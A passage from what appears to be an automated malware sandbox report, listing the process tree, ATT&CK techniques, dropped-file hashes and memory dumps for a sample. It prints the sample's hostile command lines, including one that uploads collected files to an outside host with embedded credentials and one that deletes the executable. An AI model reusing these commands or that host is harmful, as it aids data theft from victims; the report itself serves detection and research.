  "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" a -ppEsTs}eLdS54 rundll32.dat rundll32_*
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3156
- C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe
  "C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7EA.tmp\ren.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1208
- C:\Program Files\Internet Explorer\iexplore.exe
  "d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe" -u pompei -p 123123 -DD -F -P 443 livesecureupdate.com /sys *.pax
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:496
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:496 CREDAT:17410 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:4852
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c dir && dir && del "C:\Users\Admin\AppData\Local\Temp\d16ce7cf123a64124e62853b6334fb85_JaffaCakes118.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4964

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
471B

MD5
ba1bf8cf86ec57057637af172911cd13

SHA1
32daf654da1afadd3021d486164516318295debf

SHA256
77fb6880c4ae2e78d705501c19c9cd4a4d3d2f9e42d45e313561caa0b6c832e0

SHA512
46780dd891659bde9eb87f07c857a43de3de9eccc53077b437282d1dd0c1339321399b0faa4cc2a6534396cdd4d358209bfe1f9622bda1e5681acef2b9c4a255

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
404B

MD5
fe4e490beb62b9a4a3bf9b199dbea324

SHA1
0a05740d27d0aac8c798fe72924a5fcc4543ea2e

SHA256
de0f251d1587eea1d80aea8a148a7829304ee442fb33f0f8c7125c62bd5f0901

SHA512
e7a21bd78d5974838020d2c942b878f9a60e92e1258e98db18c97d91ba2056ed23c58610a609c4d60192e123653c27517ed898c8f7e70a64fede5510a8fca242

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\374sd3b\imagestore.dat

Filesize
4KB

MD5
1c6af8ea6bc8f76f6f337c650d2ef7b7

SHA1
9aaff38f63296e43090517f1da994c8c2d5422a9

SHA256
9cf5d24df85889746f26e73d489693a65dab79fc519c95be64bcdc2b2ca82b6a

SHA512
540dff05dcd82bb350f5c36f1b0c1d870f0fb5966c67c4b8f424a8184f96f1cbba0ed56c254f90072e4be42e802147294d91d0f20571feb52aba3075d6a9bd36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KDOTUZKP\favicon-white-bg-444-mg[1].ico

Filesize
4KB

MD5
d24a03830318cf195ba065c94c8e12a7

SHA1
6c7174cda4dc233b5d8d8bdf02c3423471e608f6

SHA256
b088185bad4043457014cece747bf9cf9b185dd02a443f150a5157ae7ce5784e

SHA512
cba665b829e7934c145bac967d49c701a7e74afa27b01be04359f9d941347c18111e6daaa01f3a50caebebf9e87a9a3031cecc6e7c08d6c600410efc6559044d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KDOTUZKP\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\7EA.tmp\ren.bat

Filesize
57B

MD5
97b2de650ff2e2112fbca643c7e69e0f

SHA1
556323bba3c43d1526e5ee23f73899f454282afa

SHA256
9d24f2630f43ffea0c8c64826c52bd2ebaf1107cb5bb1e7e99c048437281a00b

SHA512
e1972690c69ea16396235deef404d95e5219cfda389c4cc610fec28bf55aceed45bf0ed315aec69a299bfc7d34d25d73680ddcccbc3111d8d6484c00135c8b02

Download Submit
C:\Users\Admin\AppData\Local\Temp\rundll32.dat

Filesize
386B

MD5
1218902428c2e28154d20738abfd9fcd

SHA1
e776d349025239339d7bb87f27f45bce657fd330

SHA256
d5ed9261184e58dfcdd6c94a4bb58e4e7dc95861695d8e330e43ea157f26761a

SHA512
06d6496b3c0780dc7462e9794bc5804d4b2aab672db8fa260733c8ff5d1c3ca2f05c294b25779e4d45d8cf5ed38d10dbe378315abe930a1c93d237664ab5bfbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\rundll32_4.sys

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\rundll32_7.sys

Filesize
219B

MD5
c39e22147c18fc4352e58f4c000962ad

SHA1
744d22c3741894018c1cabb9ab3fe4943ab3bf04

SHA256
0863114b0d43b2f59f466939de7dbf7c6d15986a041ad46cad784b42f101ac9c

SHA512
75cc751eba34585570c3f89848f743731a9153cced65c06c99d851dd724dab25dff610c413362f43be8729717e1a27bbd97861c2a81aaf75bebf3c38dea683bc

Download Submit
memory/792-65-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/792-66-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/792-64-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/792-62-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/2376-33-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2376-29-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2376-31-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2376-32-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2928-24-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/2928-42-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/2928-20-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/2928-41-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/2948-35-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/2948-37-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/2948-38-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/2948-39-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/3156-56-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/3156-45-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/3156-48-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/3156-47-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/3892-1-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3892-18-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3892-19-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3892-17-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3964-14-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/3964-6-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/3964-16-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/3964-15-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/4200-10-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4200-11-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4200-7-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4200-0-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4224-43-0x0000000010000000-0x0000000010117000-memory.dmp

Filesize
1.1MB

Download
memory/4224-60-0x0000000010000000-0x0000000010117000-memory.dmp

Filesize
1.1MB

Download
memory/4224-70-0x0000000010000000-0x0000000010117000-memory.dmp

Filesize
1.1MB

Download
memory/4244-22-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/4244-26-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/4244-27-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/4244-25-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/4460-13-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/4460-4-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/4460-12-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/4460-9-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download